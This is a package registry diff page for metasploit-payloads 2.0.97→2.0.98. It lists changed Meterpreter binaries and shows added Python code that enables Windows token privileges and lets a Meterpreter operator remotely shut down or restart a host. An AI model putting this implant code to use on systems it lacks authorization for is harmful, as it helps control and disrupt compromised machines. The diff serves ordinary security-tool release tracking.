RubyGems - metasploit-payloads - Versions diffs - 2.0.97 → 2.0.98 - Mend

metasploit-payloads 2.0.97 → 2.0.98

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (76) hide show

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 49f65721e1a9aa745903acaa4c78087d20494cd1cc064e4101ce866eb62eb7fb
-  data.tar.gz: be91cc58bcee64d662b1b292fd342f4d7db00a8444edaeaa829011b922c497a3
+  metadata.gz: e258521427e2bc71990e2e646fbf617fc70569fc6a1ca41d886eea9a6a5dd9c2
+  data.tar.gz: 77d18985a73b5f3e87f77cfb6f15d346b1316e03ea05bde053e23c828aa432f4
 SHA512:
-  metadata.gz: 26baf826a30e01d34f7f7cc65d733ff97a0677fa9a315ddc167a3522dae0b56972a8f5ea3963c0765c8e8b398edcbd404720d29bb35b0ae2c380a39c62ca47c0
-  data.tar.gz: db20a24fb97fe4b781708c7df06ee2b92f04d0440c7c983b368cafa367fb67c40101a6168d7848f4606f38f119bef7b4de0cca3fcfa65561dcc575f30baa5d6d
+  metadata.gz: cee1509b9a8f0780c1d5d02d87f6412a463275d6a72743767c4229115448a86a63e25cddb529cd6e2ee4ea2aa44ecfd7f3b331de74b3b085c35961b45e8fb436
+  data.tar.gz: bc60aa01a5781c8a22d78be70fa02665456552fe4fb44c867655ed3e88834f790c3b55c4176d4c1e036bec0a0425b701842f1ab3c3753516f04e0e56aa0970c4

checksums.yaml.gz.sig CHANGED Viewed

Binary file

data/data/android/meterpreter.jar CHANGED Viewed

Binary file

data/data/android/metstage.jar CHANGED Viewed

Binary file

data/data/android/shell.jar CHANGED Viewed

Binary file

data/data/meterpreter/elevator.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/elevator.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/elevator.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/elevator.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_bofloader.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_bofloader.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_bofloader.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_bofloader.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_espia.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_espia.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_espia.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_espia.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_extapi.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_extapi.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_extapi.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_extapi.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_incognito.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_incognito.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_incognito.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_incognito.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_kiwi.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_kiwi.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_kiwi.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_kiwi.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_lanattacks.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_lanattacks.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_lanattacks.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_lanattacks.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_peinjector.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_peinjector.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_peinjector.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_peinjector.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_powershell.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_powershell.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_powershell.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_powershell.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_priv.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_priv.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_priv.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_priv.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_python.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_python.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_python.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_python.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_sniffer.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_sniffer.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_stdapi.py CHANGED Viewed

@@ -21,6 +21,9 @@ except ImportError:
     has_ctypes = False
     has_windll = False
+if has_windll:
+    from ctypes import wintypes
 try:
     import pty
     has_pty = True
@@ -357,6 +360,36 @@ if has_ctypes:
             ("lpszProxy", ctypes.c_wchar_p),
             ("lpszProxyBypass", ctypes.c_wchar_p)]
+    class LUID(ctypes.Structure):
+        _fields_ = [
+            ('LowPart',  wintypes.DWORD),
+            ('HighPart', wintypes.LONG)
+        ]
+        def __eq__(self, __o):
+            return (self.LowPart == __o.LowPart and self.HighPart == __o.HighPart)
+        def __ne__(self, __o):
+            return (self.LowPart != __o.LowPart or self.HighPart != __o.HighPart)
+    class LUID_AND_ATTRIBUTES(ctypes.Structure):
+        _fields_ = [
+            ('Luid',       LUID),
+            ('Attributes', wintypes.DWORD)
+        ]
+    class TOKEN_PRIVILEGES(ctypes.Structure):
+        _fields_ = [
+            ('PrivilegeCount', wintypes.DWORD),
+            ('Privileges',     LUID_AND_ATTRIBUTES * 0),
+        ]
+        def get_array(self):
+            array_type = LUID_AND_ATTRIBUTES * self.PrivilegeCount
+            return ctypes.cast(self.Privileges, ctypes.POINTER(array_type)).contents
+    PTOKEN_PRIVILEGES = ctypes.POINTER(TOKEN_PRIVILEGES)
     #
     # Linux Structures
     #
@@ -999,6 +1032,45 @@ def windll_GetVersion():
     dwBuild        = ((dwVersion & 0xffff0000) >> 16)
     return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
+def enable_privilege(name, enable=True):
+    TOKEN_ALL_ACCESS = 0xf01ff
+    SE_PRIVILEGE_ENABLED = 0x00000002
+    GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
+    GetCurrentProcess.restype = wintypes.HANDLE
+    OpenProcessToken = ctypes.windll.advapi32.OpenProcessToken
+    OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
+    OpenProcessToken.restype = wintypes.BOOL
+    LookupPrivilegeValue = ctypes.windll.advapi32.LookupPrivilegeValueW
+    LookupPrivilegeValue.argtypes = [wintypes.LPCWSTR, wintypes.LPCWSTR, ctypes.POINTER(LUID)]
+    LookupPrivilegeValue.restype = wintypes.BOOL
+    AdjustTokenPrivileges = ctypes.windll.advapi32.AdjustTokenPrivileges
+    AdjustTokenPrivileges.argtypes = [wintypes.HANDLE, wintypes.BOOL, PTOKEN_PRIVILEGES, wintypes.DWORD, PTOKEN_PRIVILEGES, ctypes.POINTER(wintypes.DWORD)]
+    AdjustTokenPrivileges.restype = wintypes.BOOL
+    token = wintypes.HANDLE()
+    success = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, token)
+    if not success:
+        return False
+    luid = LUID()
+    name = ctypes.create_unicode_buffer(name)
+    success = LookupPrivilegeValue(None, name, luid)
+    if not success:
+        return False
+    size = ctypes.sizeof(TOKEN_PRIVILEGES)
+    size += ctypes.sizeof(LUID_AND_ATTRIBUTES)
+    buffer = ctypes.create_string_buffer(size)
+    tokenPrivileges = ctypes.cast(buffer, PTOKEN_PRIVILEGES).contents
+    tokenPrivileges.PrivilegeCount = 1
+    tokenPrivileges.get_array()[0].Luid = luid
+    tokenPrivileges.get_array()[0].Attributes = SE_PRIVILEGE_ENABLED if enable else 0
+    return AdjustTokenPrivileges(token, False, tokenPrivileges, 0, None, None)
 @register_function
 def channel_open_stdapi_fs_file(request, response):
     fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
@@ -1335,6 +1407,23 @@ def stdapi_sys_process_get_processes(request, response):
         return stdapi_sys_process_get_processes_via_ps(request, response)
     return ERROR_FAILURE, response
+@register_function_if(has_windll)
+def stdapi_sys_power_exitwindows(request, response):
+    SE_SHUTDOWN_NAME = "SeShutdownPrivilege"
+    flags = packet_get_tlv(request, TLV_TYPE_POWER_FLAGS)['value']
+    reason = packet_get_tlv(request, TLV_TYPE_POWER_REASON)['value']
+    if not enable_privilege(SE_SHUTDOWN_NAME):
+        return error_result_windows(), response
+    ExitWindowsEx = ctypes.windll.user32.ExitWindowsEx
+    ExitWindowsEx.argtypes = [ctypes.c_uint32, ctypes.c_ulong]
+    ExitWindowsEx.restype = ctypes.c_int8
+    if not ExitWindowsEx(flags, reason):
+        return error_result_windows(), response
+    return ERROR_SUCCESS, response
 @register_function_if(has_windll)
 def stdapi_sys_eventlog_open(request, response):
     source_name = packet_get_tlv(request, TLV_TYPE_EVENT_SOURCENAME)['value']

data/data/meterpreter/ext_server_stdapi.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_stdapi.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_stdapi.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_stdapi.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_unhook.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_unhook.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_unhook.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_unhook.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_winpmem.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_winpmem.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_winpmem.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_winpmem.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/metsrv.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/metsrv.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/metsrv.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/metsrv.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/screenshot.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/screenshot.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/screenshot.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/screenshot.x86.dll CHANGED Viewed

Binary file

data/lib/metasploit-payloads/version.rb CHANGED Viewed

@@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
-  VERSION = '2.0.97'
+  VERSION = '2.0.98'
   def self.version
     VERSION

data.tar.gz.sig CHANGED Viewed

Binary file

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: metasploit-payloads
 version: !ruby/object:Gem::Version
-  version: 2.0.97
+  version: 2.0.98
 platform: ruby
 authors:
 - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2022-09-29 00:00:00.000000000 Z
+date: 2022-11-03 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake

metadata.gz.sig CHANGED Viewed

@@ -1,3 +1 @@
- jA����AXoX.�p��A�o�:�9��UG����"+/P��R�g��>��jy۱"1Q
-L������o.���5;�G�5�u����S
-��6l�7~���3�{��DUHՃ ��d6Yn���R���7��Li�SO�I��̡�p�8��5L��~p,����3�Ff�7��$���n57
+��SIg}%��~҂�9�[8~V�i��ى�&b��B_`Q)�(W��&��Q���ը��;�0i��d䗿ΠL�Y�\����C%�J��J6<�d�'�Trh��5�)��<�L�|���